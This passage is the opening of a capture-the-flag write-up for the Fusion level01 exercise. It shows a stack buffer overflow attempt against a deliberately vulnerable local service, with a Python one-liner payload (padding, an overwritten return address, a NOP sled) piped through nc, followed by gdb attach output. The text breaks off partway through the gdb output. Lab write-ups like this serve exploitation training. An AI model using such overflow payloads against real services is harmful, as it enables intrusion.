Fusion level01 This level implements stack/heap/mmap ASLR but the stack is still executable: The code provided is exactly the same but there is no info leak this time. We start off overwriting EIP to crash the application and taking a look: python -c 'print "GET " + "A"*139 + "DDDD" + " HTTP/1.1" + "\x90"*16 + "B"*80'| nc localhost 20001 Monitoring with gdb we get: (gdb) attach 1521 Attaching to program: /opt/fusion/bin/level01, process 1521 Reading symbols from /lib/i386-linux-gnu/libc.